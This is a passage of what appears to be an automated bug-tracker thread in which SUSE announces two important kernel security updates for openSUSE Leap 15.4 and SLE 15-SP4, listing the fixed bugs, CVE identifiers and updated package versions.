SUSE-SU-2022:3288-1: An update that solves 25 vulnerabilities, contains four features and has 91 fixes is now available.

Category: security (important)
Bug References: 1023051,1032323,1065729,1156395,1189999,1190497,1192968,1194592,1194869,1194904,1195480,1195917,1196616,1197158,1197391,1197755,1197756,1197757,1197763,1198410,1198577,1198702,1198971,1199356,1199515,1200301,1200313,1200431,1200544,1200845,1200868,1200869,1200870,1200871,1200872,1200873,1201019,1201308,1201361,1201442,1201455,1201489,1201610,1201726,1201768,1201865,1201940,1201948,1201956,1202094,1202096,1202097,1202113,1202131,1202154,1202262,1202265,1202346,1202347,1202385,1202393,1202447,1202471,1202558,1202564,1202623,1202636,1202672,1202681,1202710,1202711,1202712,1202713,1202715,1202716,1202757,1202758,1202759,1202761,1202762,1202763,1202764,1202765,1202766,1202767,1202768,1202769,1202770,1202771,1202773,1202774,1202775,1202776,1202778,1202779,1202780,1202781,1202782,1202783,1202822,1202823,1202824,1202860,1202867,1202872,1202898,1202989,1203036,1203041,1203063,1203098,1203107,1203117,1203138,1203139,1203159
CVE References: CVE-2016-3695,CVE-2020-36516,CVE-2021-33135,CVE-2021-4037,CVE-2022-1184,CVE-2022-20368,CVE-2022-20369,CVE-2022-2585,CVE-2022-2588,CVE-2022-26373,CVE-2022-2639,CVE-2022-2663,CVE-2022-28356,CVE-2022-28693,CVE-2022-2873,CVE-2022-2905,CVE-2022-2938,CVE-2022-2959,CVE-2022-2977,CVE-2022-3028,CVE-2022-3078,CVE-2022-36879,CVE-2022-36946,CVE-2022-39188,CVE-2022-39190
JIRA References: SLE-19359,SLE-23766,SLE-24572,SLE-24682
Sources used:
openSUSE Leap 15.4 (src):    kernel-azure-5.14.21-150400.14.13.1, kernel-source-azure-5.14.21-150400.14.13.1, kernel-syms-azure-5.14.21-150400.14.13.1
SUSE Linux Enterprise Module for Public Cloud 15-SP4 (src):    kernel-azure-5.14.21-150400.14.13.1, kernel-source-azure-5.14.21-150400.14.13.1, kernel-syms-azure-5.14.21-150400.14.13.1

Comment 57 Swamp Workflow Management 2022-09-16 19:27:07 UTC
SUSE-SU-2022:3293-1: An update that solves 23 vulnerabilities, contains 5 features and has 88 fixes is now available.

Category: security (important)
Bug References: 1023051,1032323,1065729,1156395,1190497,1194592,1194869,1194904,1195480,1195917,1196616,1197158,1197391,1197755,1197756,1197757,1197763,1198410,1198971,1199086,1199364,1199670,1200313,1200431,1200465,1200544,1200845,1200868,1200869,1200870,1200871,1200872,1200873,1201019,1201308,1201427,1201442,1201455,1201489,1201610,1201675,1201725,1201768,1201940,1201956,1201958,1202096,1202097,1202113,1202131,1202154,1202262,1202265,1202312,1202346,1202347,1202385,1202393,1202447,1202471,1202558,1202564,1202623,1202636,1202672,1202681,1202710,1202711,1202712,1202713,1202715,1202716,1202757,1202758,1202759,1202761,1202762,1202763,1202764,1202765,1202766,1202767,1202768,1202769,1202770,1202771,1202773,1202774,1202775,1202776,1202778,1202779,1202780,1202781,1202782,1202783,1202822,1202823,1202824,1202860,1202867,1202874,1202898,1203036,1203041,1203063,1203107,1203117,1203138,1203139,1203159
CVE References: CVE-2016-3695,CVE-2020-36516,CVE-2021-33135,CVE-2021-4037,CVE-2022-20368,CVE-2022-20369,CVE-2022-2588,CVE-2022-2639,CVE-2022-2663,CVE-2022-28356,CVE-2022-28693,CVE-2022-2873,CVE-2022-2905,CVE-2022-2938,CVE-2022-2959,CVE-2022-2977,CVE-2022-3028,CVE-2022-3078,CVE-2022-32250,CVE-2022-36879,CVE-2022-36946,CVE-2022-39188,CVE-2022-39190
JIRA References: SLE-18130,SLE-19359,SLE-20183,SLE-23766,SLE-24572
Sources used:
openSUSE Leap 15.4 (src):    dtb-aarch64-5.14.21-150400.24.21.1, kernel-64kb-5.14.21-150400.24.21.2, kernel-debug-5.14.21-150400.24.21.2, kernel-default-5.14.21-150400.24.21.2, kernel-default-base-5.14.21-150400.24.21.2.150400.24.7.2, kernel-docs-5.14.21-150400.24.21.3, kernel-kvmsmall-5.14.21-150400.24.21.2, kernel-obs-build-5.14.21-150400.24.21.2, kernel-obs-qa-5.14.21-150400.24.21.1, kernel-source-5.14.21-150400.24.21.2, kernel-syms-5.14.21-150400.24.21.1, kernel-zfcpdump-5.14.21-150400.24.21.2
SUSE Linux Enterprise Workstation Extension 15-SP4 (src):    kernel-default-5.14.21-150400.24.21.2
SUSE Linux Enterprise Module for Live Patching 15-SP4 (src):    kernel-default-5.14.21-150400.24.21.2, kernel-livepatch-SLE15-SP4_Update_3-1-150400.9.3.2
SUSE Linux Enterprise Module for Legacy Software 15-SP4 (src):    kernel-default-5.14.21-150400.24.21.2
SUSE Linux Enterprise Module for Development Tools 15-SP4 (src):    kernel-docs-5.14.21-150400.24.21.3, kernel-obs-build-5.14.21-150400.24.21.2, kernel-source-5.14.21-150400.24.21.2, kernel-syms-5.14.21-150400.24.21.1
SUSE Linux Enterprise Module for Basesystem 15-SP4 (src):    kernel-64kb-5.14.21-150400.24.21.2, kernel-default-5.14.21-150400.24.21.2, kernel-default-base-5.14.21-150400.24.21.2.150400.24.7.2, kernel-source-5.14.21-150400.24.21.2, kernel-zfcpdump-5.14.21-150400.24.21.2
SUSE Linux Enterprise High Availability 15-SP4 (src):    kernel-default-5.14.21-150400.24.21.2
